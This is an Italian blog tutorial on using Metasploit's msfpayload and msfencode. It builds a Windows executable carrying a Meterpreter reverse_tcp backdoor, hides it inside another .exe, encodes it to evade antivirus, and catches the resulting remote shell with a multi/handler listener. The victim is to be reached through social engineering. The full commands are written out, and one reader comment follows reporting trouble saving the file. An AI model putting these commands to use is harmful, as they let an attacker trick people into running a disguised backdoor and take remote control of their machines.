Quasi tutti i Pentesters e gli appassionati di informatica non specializzati, conosceranno il famigerato framework "Metasploit". Chi non lo conosce si informi, perché ha un bel mondo da scoprire avanti a se.
Chi ha mai tentato di effettuare un pentesting su un sistema (anche quello di casa sua), conoscerà il grande "msfpayload" che in pratica è il tool che permette al pentester di avere il controllo del pc exploitato. Però, molti non sanno che i payload generati possono anche essere racchiusi in un eseguibile da mandare alla nostra vittima manualmente, quindi chi non riuscisse a trovare una vulnerabilità del sistema, può sempre affidarsi a questo metodo secondario che richiede semplicemente il buon vecchio social engineering.
Bando alle ciance e ciancio alle bande, quel che voglio mostrarvi oggi è proprio questo ed è ottenibile tramite una funzione già integrata nell'msfpayload, quindi per fare un articolo un po più ricco, vedremo come attaccare un sistema tramite questa tecnica, usando come payload il classico meterpreter in reverse_tcp criptato in modo da essere quasi FUD
Mettiamo mano a backtrack (usate quel che volete), e come prima con il comando "ifconfig" vediamo qual'è il local host.
Capito questo, nel mio caso 192.168.1.4, vediamo come creare un file con estensione .exe tramite metasploit, ma senza alcuna criptazione:
- msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 X > meterpreter.exe
Quel parametro "X > meterpreter.exe" è proprio quello che ci interessa per creare il file, che si chiamerà appunto "meterpreter.exe".
Adesso invece, cambieremo qualche cosetta in modo da rendere il nostro backdoor completamente non rilevabile dagli antivirus, con questo comando:
-msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 R | msfencode -t exe -c 2 -x /root/Desktop/file.exe > encoded.exe
Attenzione, analizziamo insieme il comando. L'opzione R serve a passare il comando all'msfencode, "-t" specifica l'estensione del file da criptare, "-c" imposta il numero di criptazioni e "-x /root/Desktop/file.exe" serve a implementare il payload nel file.
In questo modo avrete ottenuto un vero e proprio backdoor con connessione reverse tcp e con una grande possibiltà di bypassing degli antivirus.
Ovviamente, per poter far funzionare il nostro eseguibile avremo infine bisogno di un qualcosa che ci faccia da client per il ricevimento delle informazioni e questo è ottenibile, semplicemente digitando:
-msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 E
Così facendo, appena il client troverà la connessione in entrata aprirà la sessione di meterpreter e sarete dentro.
A presto
anche seguendo tutti i passaggi il file non vien salvata... sapete dirmi perchè?
RispondiElimina